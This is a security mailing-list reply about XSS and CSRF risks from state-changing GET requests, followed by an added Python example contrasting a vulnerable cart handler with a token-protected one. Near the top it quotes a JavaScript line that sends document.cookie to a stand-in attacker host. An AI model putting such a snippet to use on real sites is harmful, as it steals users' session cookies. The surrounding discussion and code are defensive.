On Jun 17, 9:25 am, Gervase Markham <[EMAIL PROTECTED]> wrote:
> What's the use case for locking down all page communications?

The traditional one: XSS cookie-stealing attacks like this:

var image = new Image();
image.src = 'http://attacker.com/log.php?cookie=' + encodeURIComponent(document.cookie);

A more modern one: iframe injections, e.g.:
http://www.webpronews.com/topnews/2008/03/28/major-sites-hit-with-iframe-injection-attacks

> > It also means that it wouldn't be that useful to prevent cross site
> > request forgery (realistically, "safe" operations aren't unless your
> > web programmers abide by them, and I would venture that many don't).
> I would venture that most do. Doing a web purchase via a GET runs into
> problems with e.g. the user doing a Reload.

We did some tests in the lab and in a quick check of a few retailers didn't find sites that would allow you to complete web purchases with GET requests, but we found several places (I believe thinkgeek and maple music were some of the targets) that let you add to a cart with GETs, so we can't really claim that GET requests do nothing to change the state of a given web application, even though I believe the specs say they shouldn't.

I hadn't been thinking about purchases, though: I was actually thinking in terms of using GET requests to add comments/forum posts to a site, which I have seen, and could be used to make self-propagating web-worms a la Samy, to insert iframe exploits in vulnerable sites, or just to use users' credentials to post spam including links to dangerous sites.

_______________________________________________
dev-security mailing list
[email protected]
https://lists.mozilla.org/listinfo/dev-security
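The state-changing GET that the message describes (add to cart, post a comment) and the fix a site owner would apply, as an added example that is not part of the original thread or of any site it names. It is a toy request handler: the `Request` class, the `/cart/add` path, the session store and the server secret are all constructed for illustration. The vulnerable handler mutates the cart on a GET, so a request the browser sends on behalf of another page (with the user's cookie attached automatically) changes state exactly as a user-initiated one would; the hardened handler only accepts POST and requires a per-session synchronizer token that a third-party page never learns.

```python
# Added example (not from the thread): a toy web handler showing why a
# state-changing GET is forgeable, and the hardened form that requires POST
# plus a per-session synchronizer token. Names, paths and values are constructed.
import hashlib
import hmac
import secrets
from dataclasses import dataclass, field

# Placeholder server-side secret; a real deployment loads this from configuration.
SERVER_SECRET = b"constructed-example-secret"

# Constructed in-memory session store: session id -> cart contents.
SESSIONS: dict[str, list[str]] = {}


@dataclass
class Request:
    """Minimal stand-in for an HTTP request as a framework would present it."""
    method: str
    path: str
    cookies: dict[str, str]
    params: dict[str, str] = field(default_factory=dict)  # query or form fields


def new_session() -> str:
    sid = secrets.token_hex(16)
    SESSIONS[sid] = []
    return sid


def csrf_token_for(sid: str) -> str:
    """Synchronizer token derived from the session id. The browser only learns
    it from a page this origin served, so a request triggered from elsewhere
    cannot carry the right value."""
    return hmac.new(SERVER_SECRET, sid.encode(), hashlib.sha256).hexdigest()


def vulnerable_add_to_cart(req: Request) -> tuple[int, str]:
    """Mutates the cart on GET /cart/add?item=... with no check beyond the
    cookie, which the browser attaches regardless of which page caused the
    request. This is the pattern the thread observed on real retailers."""
    sid = req.cookies.get("sid")
    if sid not in SESSIONS:
        return 401, "no session"
    SESSIONS[sid].append(req.params["item"])
    return 200, "added"


def hardened_add_to_cart(req: Request) -> tuple[int, str]:
    """Only POST may change state, and the POST must carry the session's token."""
    sid = req.cookies.get("sid")
    if sid not in SESSIONS:
        return 401, "no session"
    if req.method != "POST":
        return 405, "state-changing requests must use POST"
    supplied = req.params.get("csrf_token", "")
    if not hmac.compare_digest(supplied, csrf_token_for(sid)):
        return 403, "missing or invalid CSRF token"
    SESSIONS[sid].append(req.params["item"])
    return 200, "added"


def demo() -> dict[str, object]:
    """Send a forged request (cookie present, no token) to both handlers and a
    legitimate POST to the hardened one; report what each did to the cart."""
    sid = new_session()
    forged = Request("GET", "/cart/add", {"sid": sid}, {"item": "forged-item"})
    v_status, _ = vulnerable_add_to_cart(forged)
    after_vulnerable = list(SESSIONS[sid])

    SESSIONS[sid].clear()
    h_get_status, _ = hardened_add_to_cart(forged)
    forged_post = Request("POST", "/cart/add", {"sid": sid}, {"item": "forged-item"})
    h_post_status, _ = hardened_add_to_cart(forged_post)
    after_forged = list(SESSIONS[sid])

    legit = Request("POST", "/cart/add", {"sid": sid},
                    {"item": "chosen-item", "csrf_token": csrf_token_for(sid)})
    legit_status, _ = hardened_add_to_cart(legit)
    return {
        "vulnerable_get_status": v_status,
        "cart_after_vulnerable_get": after_vulnerable,
        "hardened_get_status": h_get_status,
        "hardened_post_no_token_status": h_post_status,
        "cart_after_forged_attempts": after_forged,
        "legit_post_status": legit_status,
        "cart_after_legit_post": list(SESSIONS[sid]),
    }


if __name__ == "__main__":
    for name, value in demo().items():
        print(f"{name}: {value}")
```

The method check alone is not the defence: a cross-site POST is just as easy to trigger as a cross-site GET, which is why the hardened handler also demands the token. What refusing GET buys is that the "safe method" contract the specs describe actually holds, so a URL loaded through an image, iframe or link can never change the user's state.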
